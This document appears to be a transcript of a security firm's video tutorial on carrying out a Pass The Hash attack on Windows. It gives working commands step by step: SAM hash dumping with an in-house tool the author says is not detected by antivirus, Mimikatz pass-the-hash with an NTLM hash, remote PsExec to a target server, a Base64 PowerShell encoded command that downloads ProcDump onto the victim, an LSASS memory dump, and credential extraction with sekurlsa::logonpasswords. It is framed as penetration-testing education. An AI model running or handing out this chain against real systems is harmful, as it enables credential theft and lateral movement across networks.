Pass The Hash is the attack of the industry! It works anywhere where credentials are not managed properly. Attacks can occur both on local and domain accounts.
There are certain types of prevention measures available but most often they are not implemented in the infrastructure. In other words, thanks to the single-sign-on in Windows, it is possible to migrate from host to host when being authenticated only with a hash.
First of all, every single time penetration tests are to be done, Pass The Hash is one of the elements of the whole test. The reason is that many companies do not do anything about it, while the attack is popular for the past couple of years.
In this episode you will be guided on how to perform the Pass The Hash attack and the pre-conditions for it and why managing local administrator passwords is important but not everything. Take, for example, logging on with privileged accounts to the workstation or to the servers is something that we should definitely pay attention to. Throughout the whole process, I will use the tool, CQHashDumpV2, which is quite a unique tool made by our team, it is also not recognized by any anti-virus (for now).
Pass The Hash Attack – Procedure
When performing the Pass The Hash from scratch local administrator’s privileges are required, mainly because of the Debug Privilege; you should also have two consoles opened: one as a user and the other one as an administrator.
In the console running as an administrator, we can identify it by the list of different kinds of privileges. Here, I’ll appear as a member of the local administrators.
If you have not tried the Pass The Hash attack before, stay tuned and let’s go.
Step one: getting the tool
The first thing needed in order to perform Pass The Hash is to get the hash. There are plenty of tools available in the market that you can use. But be careful because a lot of them may not be really safe. One of the examples is a free tool called pwdump which comes in many different variants and which, sometimes contain malware. The reason why we wrote our own tool, CQHashDumpV2, is because we needed it of course for our penetration tests.
It’s absolutely not acceptable to use the tools that we don’t know anywhere in the customer’s environment. Only the tools that are our tools or the ones that we know well.
Step two: hash dumping
The first thing here is to elevate to the Local System as we have to get access to the secret hives in the registry. For that we will use the PsExec tool that was already shown in the previous video, so if you stay with me you should be able to use it for now: psexec -s -i -d cmd.exe.
You can see that I am the nt authority\system. The next stage is to go to the tools folder and I will use CQHashDumpV2. I will use option /samdump. This allows me to perform the live hash dump.
There are two types of hashes. One of them is called LM Hash and if you observe closely, this is a mirrored value. These values are just the same. That means that it is an empty password. Technically it means that this hash is not being used. The part after the colon is called NT Hash or NTLM Hash. This is MD4 calculated for the users’ passwords and we will use it to perform Pass The Hash attack.
Here I’m logged on as the local account Paula and I want to become the local Administrator, so in order to do it, I will use Mimikatz. It’s our edition, marked as “CQURE Edition”.
We will grab the Debug Privilege first: privilege::debug. This is the privilege we need in order to work with processes like lsass.exe.
When we get it then the next stage is to use: sekurlsa::pth for Pass The Hash. Then the specified username – in this case administrator – and then domain: localhost, because in this case, we don’t have any kind of domain credentials and /ntlm with that particular hash. The command looks like this:
sekurlsa::pth /user:Administrator /domain:localhost /ntlm:<here you put NT Hash>
This is the Pass The Hash attack, as you see it’s very simple. In this attack we authenticate locally, we create a token, where we will be a local administrator (with SID 500).
A new console will be opened automatically. If I issue whoami command it will give an interesting result as I have got information about myself, but that’s not really true we do have already an administrative token here.
The next thing that we will do is to use PsExec tool and we will verify if we are able to get access to that particular server here and that server is going to be 10.10.10.200. We would like to execute cmd.exe remotely.
You will observe a difference. Let me start this console as an administrator. This is the console that is local and the gray one is the console with that local administrator’s token. So we choose to use PsExec like this: psexec.exe \\10.10.10.200 cmd.exe. We are not able to use it as the original local account because the username or password is incorrect. This is also interesting because we might ask: what kind of password we are talking about? In this case, this is the single sign-on used by Windows.
On the administrator’s token
Moving further, we will get into the same situation as before but with the local administrator’s token. In the new console, we need to issue the same Psexec command. Now, it takes a little while, but you will see that it works because a local administrator is using the same password. When logged on, issue whoami and you will see you are the local administrator.
How to perform a memory dump
In the previous tutorials I showed you that scenario in order to implement LAPS: Local Administrator Password Solution for management of the local administrator passwords, but over here we will continue because you will be shown how we are able, at that stage, to perform memory dump in order to get higher privileges during the attack.
Now, this could be a little bit of a challenge as we need to upload a tool into the server that is our victim here. The only thing that we’ve got though is the command line. We could do it by connecting with the PsExec, there is a /c option for copying. But let’s say we didn’t do it, now what? We could use FTP and we could try to copy something from the net. One of my favorite ways is to use the PowerShell encoded command.
PowerShell encoded command
PowerShell encoded command can be executed once on the box remotely. I have prepared a little PowerShell script where we are using Invoke-WebRequest cmdlet to download a Procdump tool into pd.exe file. So, we got it. We are converting this to Base64.
$tool=”Invoke-WebRequest -OutFile c:\temp\pd.exe”
The Base64 result we can stream to a file, let’s say base64.txt, and our base64.txt will be a command that we will be using within the PowerShell encoded command. It’s going to be like this: PowerShell –ec <here you should paste base64 string>.
After running the PowerShell encoded command, we download the tool from the web and we save it in the folder. The pd.exe is our ProcDump.
For now, what is important is how to use these kinds of tools. For example, ProcDump, when run for the first time, it has a parameter to accept EULA (–accepteula), it is necessary to use it otherwise you will get stuck in the remote console. We would like to perform the memory dump of the process lsass.exe: procdump.exe –accepteula -ma lsass.exe. The dump is being written, so the dump is ready.
As you remember from the previous videos, you can take this particular dump and then use it with Mimikatz for instance, for the memory analysis and then we are able to extract information from it.
We will switch to the machine where we have the dump. We can rename it to lsass.dmp. We can open Mimikatz and then we issue:
and then: sekurlsa::logonpasswords
and then we are able to spot in this dump, all the interesting data that is related to the user’s credentials.
We are doing this on the remote server right now but in the whole hacking process, this will not be possible. You can try to copy that particular data to your client back and then analyze it on your side. This is how it’s meant to be I’m showing you information about what is in this dump.
We have performed Pass The Hash attack and you should be familiar with all the steps in order to reproduce it. Remember that attack is possible when you have the possibility to get the Debug Privilege, that means you must be a member of the Local Administrators group and this is the prerequisite for the Pass The Hash attack. Remember that PsExec (from Sysinternals) can help here but only for educational purposes, you cannot use it for hacking (it is against the license). At the end, we need Mimikatz or some other custom tools to perform the attack. To perform the memory dumps you can use any memory dumper, for our example I used ProcDump, where at the end we have analyzed the dump by using Mimikatz.